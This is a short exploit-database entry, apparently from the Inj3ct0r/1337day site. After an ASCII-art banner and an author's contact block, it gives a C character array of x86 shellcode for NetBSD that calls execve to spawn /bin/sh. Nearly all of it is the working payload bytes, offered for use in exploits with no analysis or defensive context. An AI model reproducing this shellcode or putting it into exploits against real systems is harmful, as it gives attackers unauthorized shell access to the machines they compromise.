/* * * 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 * 0 _ __ __ __ 1 * 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 * 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 * 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 * 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 * 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 * 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 * 1 \ \____/ >> Exploit database separated by exploit 0 * 0 \/___/ type (local, remote, DoS, etc.) 1 * 1 1 * 0 [x] Official Website: http://www.1337day.com 0 * 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 * 0 0 * 1 ========================================== 1 * 0 I'm Taurus Omar Member From Inj3ct0r TEAM 1 * 1 ========================================== 0 * 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 * | | * | NetBSD/x86 - Execve() of /bin/sh/ | * -------------------------------------------------------------------------- * * +----------------| ABOUT ME |--------------------+ * NAME: TAURUS OMAR - * LINE: INDEPENDENT SECURITY RESEARCHER - * HOME: ACCESOILEGAL.BLOGSPOT.COM - * Fcbook: facebook.com/OMARTAURUS - * TWITTER: @taurusomar_ - * E-MAIL: omar-taurus[at]dragonsecurity[dot]org - * E-MAIL: omar-taurus[at]live[dot]com - * PWNED: #ZUUU - * +------------------------------------------------+ * * Exploit Title: NetBSD/x86 - Execve() of /bin/sh/ * Category: Shellcode */ char shellcode[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0" "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50" "\xeb\x18" "\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02" "\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04";